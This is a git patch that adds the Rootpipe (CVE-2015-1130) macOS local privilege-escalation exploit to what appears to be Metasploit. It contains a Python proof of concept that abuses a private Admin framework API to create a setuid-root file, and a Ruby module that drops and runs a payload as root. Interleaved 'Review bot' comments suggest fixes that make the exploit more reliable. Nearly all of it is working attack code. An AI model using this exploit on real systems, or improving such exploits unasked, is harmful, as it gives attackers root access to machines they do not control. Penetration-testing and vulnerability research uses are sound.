From c4b7b3274573d11db4a1776ef2500a79046a127f Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 9 Apr 2015 16:05:52 -0500
Subject: [PATCH] Add Rootpipe exploit

---
 data/exploits/CVE-2015-1130/exploit.py | 73 ++++++++++++++++++++++
 modules/exploits/osx/local/rootpipe.rb | 85 ++++++++++++++++++++++++++
 2 files changed, 158 insertions(+)
 create mode 100644 data/exploits/CVE-2015-1130/exploit.py
 create mode 100644 modules/exploits/osx/local/rootpipe.rb

diff --git a/data/exploits/CVE-2015-1130/exploit.py b/data/exploits/CVE-2015-1130/exploit.py
new file mode 100644
index 0000000000..0d83f3e22a
--- /dev/null
+++ b/data/exploits/CVE-2015-1130/exploit.py
@@ -0,0 +1,73 @@
+########################################################
+#
+# PoC exploit code for rootpipe (CVE-2015-1130)
+#
+# Created by Emil Kvarnhammar, TrueSec
+#
+# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
+#
+########################################################
+import os
+import sys
+import platform
+import re
+import ctypes
+import objc
+import sys
+from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
+from Foundation import NSAutoreleasePool
+
+def load_lib(append_path):
+ return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);
+
+def use_old_api():
+ return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])
+
+
+args = sys.argv
+
+if len(args) != 3:
+ print "usage: exploit.py source_binary dest_binary_as_root"
+ sys.exit(-1)
+
+source_binary = args[1]
+dest_binary = os.path.realpath(args[2])
+
+if not os.path.exists(source_binary):
+ raise Exception("file does not exist!")
+
+pool = NSAutoreleasePool.alloc().init()
+
+attr = NSMutableDictionary.alloc().init()
+attr.setValue_forKey_(04777, NSFilePosixPermissions)
+data = NSData.alloc().initWithContentsOfFile_(source_binary)
+
+print "will write file", dest_binary
+
+if use_old_api():
+ adm_lib = load_lib("/Admin.framework/Admin")
+ Authenticator = objc.lookUpClass("Authenticator")
+ ToolLiaison = objc.lookUpClass("ToolLiaison")
+ SFAuthorization = objc.lookUpClass("SFAuthorization")
+
+ authent = Authenticator.sharedAuthenticator()
+ authref = SFAuthorization.authorization()
+
+ # authref with value nil is not accepted on OS X <= 10.8
+ authent.authenticateUsingAuthorizationSync_(authref)
+ st = ToolLiaison.sharedToolLiaison()
+ tool = st.tool()
+ tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
+else:
+ adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
+ WriteConfigClient = objc.lookUpClass("WriteConfigClient")
+ client = WriteConfigClient.sharedClient()
+ client.authenticateUsingAuthorizationSync_(None)
+ tool = client.remoteProxy()
+
+ tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
+
+
+print "Done!"
+
+del pool
diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb
new file mode 100644
index 0000000000..e31e436379
--- /dev/null
+++ b/modules/exploits/osx/local/rootpipe.rb
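Review bot: The setuid-root file is created with mode 04777 (`attr.setValue_forKey_(04777, NSFilePosixPermissions)`), which leaves a world-writable, root-owned setuid binary on disk until cleanup, so any other local user can overwrite it and escalate as well; 04755 is all the exploit needs to execute the payload and should replace it: `attr.setValue_forKey_(04755, NSFilePosixPermissions)`. The `04777` octal literal and the `print` statements are Python 2 syntax (a SyntaxError under Python 3), so the PoC silently depends on the target's `python` being 2.x; a header comment such as `# Python 2 only: octal literals and print statements` would make that requirement visible. `import sys` appears twice, and `adm_lib` is assigned in both branches but never used — presumably the load is for its side effect of making the private framework's classes visible to `objc.lookUpClass`, which a comment like `# loaded for side effect only; verify the framework must be loaded before lookUpClass` would record.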
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+ Rank = GreatRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Mac OS X "Rootpipe" Privilege Escalation',
+ 'Description' => %q{
+ This module exploits a hidden backdoor API in Apple's Admin framework on
+ OS X to escalate privileges to root. Dubbed "Rootpipe."
+
+ Tested on Yosemite 10.10.2 and should work on previous versions.
+
+ The patch for this issue was not backported to older releases.
+ },
+ 'Author' => [
+ 'Emil Kvarnhammar', # Vulnerability discovery and PoC
+ 'joev', # Copy/paste monkey
+ 'wvu' # Meta copy/paste monkey
+ ],
+ 'References' => [
+ ['CVE', '2015-1130'],
+ ['EDB', '36692'],
+ ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
+ ],
+ 'DisclosureDate' => 'Apr 9 2015',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [
+ ['Mac OS X 10.10.2 Yosemite x64 (Native Payload)', {}]
+ ],
+ 'DefaultTarget' => 0
+ ))
+ end
+
+ def check
+ if ver_lt(osx_ver, '10.10.3')
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ exploit_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1130')
+ python_exploit = File.read(File.join(exploit_path, 'exploit.py'))
+ binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+ exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+ payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+
+ print_status("Writing exploit file as '#{exploit_file}'")
+ write_file(exploit_file, python_exploit)
+ register_file_for_cleanup(exploit_file)
+
+ print_status("Writing payload file as '#{payload_file}'")
+ write_file(payload_file, binary_payload)
+ register_file_for_cleanup(payload_file)
+
+ print_status('Executing payload...')
+ cmd_exec("python #{exploit_file} #{payload_file} #{payload_file}")
+ cmd_exec(payload_file)
+ end
+
+ def osx_ver
+ cmd_exec('sw_vers -productVersion').to_s.strip
+ end
+
+ def ver_lt(a, b)
+ Gem::Version.new(a) < Gem::Version.new(b)
+ end
+
+end
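Review bot: In `exploit` the output of the Python PoC run is discarded, so on a patched host, or when the target's `python` is missing or not 2.x, the module still prints 'Executing payload...' and runs `cmd_exec(payload_file)` as the unprivileged session user with no indication that the privileged write never happened; the PoC prints `Done!` only after the write call returns, so the result should be captured and the module should `fail_with` before executing. `check` is similarly fragile: `osx_ver` passes whatever `sw_vers` printed straight to `Gem::Version.new`, which raises ArgumentError on a malformed string, so an unexpected or empty result crashes `check` rather than returning `Exploit::CheckCode::Unknown`; a guard such as `return Exploit::CheckCode::Unknown unless osx_ver =~ /\A\d+(\.\d+)+\z/` would cover it. Rewritten execution step:
```ruby
    print_status('Executing payload...')
    output = cmd_exec("python #{exploit_file} #{payload_file} #{payload_file}")
    vprint_status(output)
    # exploit.py prints "Done!" only once the privileged createFile call has returned
    unless output.include?('Done!')
      fail_with(Failure::NotVulnerable, 'Rootpipe write did not complete; target may be patched or python is not 2.x')
    end
    cmd_exec(payload_file)
```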